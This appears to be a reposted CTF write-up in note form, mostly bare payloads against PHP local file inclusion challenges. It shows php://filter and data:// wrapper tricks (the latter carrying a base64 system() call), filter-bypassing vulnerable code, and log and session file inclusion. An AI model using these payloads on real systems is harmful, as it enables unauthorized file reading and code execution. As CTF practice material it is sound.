本文共 1397 字,大约阅读时间需要 4 分钟。
payload:
?file=php://filter/convert.base64-encode/resource=flag.php
payload:
?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs=
if(isset($_GET['file'])){ $file = $_GET['file']; $file = str_replace("php", "???", $file); $file = str_replace("data", "???", $file); include($file);}else{ highlight_file(__FILE__);}
?file=/var/log/nginx/access.log
if(isset($_GET['file'])){ $file = $_GET['file']; $file = str_replace("php", "???", $file); $file = str_replace("data", "???", $file); $file = str_replace(":", "???", $file); $file = str_replace(".", "???", $file); include($file);}else{ highlight_file(__FILE__);}
/tmp/sess_xbx0d
文件 include($_GET["file"]
\flflflflag.php?file=php://filter/convert.base64-encode/resource%3dflflflflag.php
this_is_not_fl4g_and_出题人_wants_girlfriend <>
转载地址:http://xfwmf.baihongyu.com/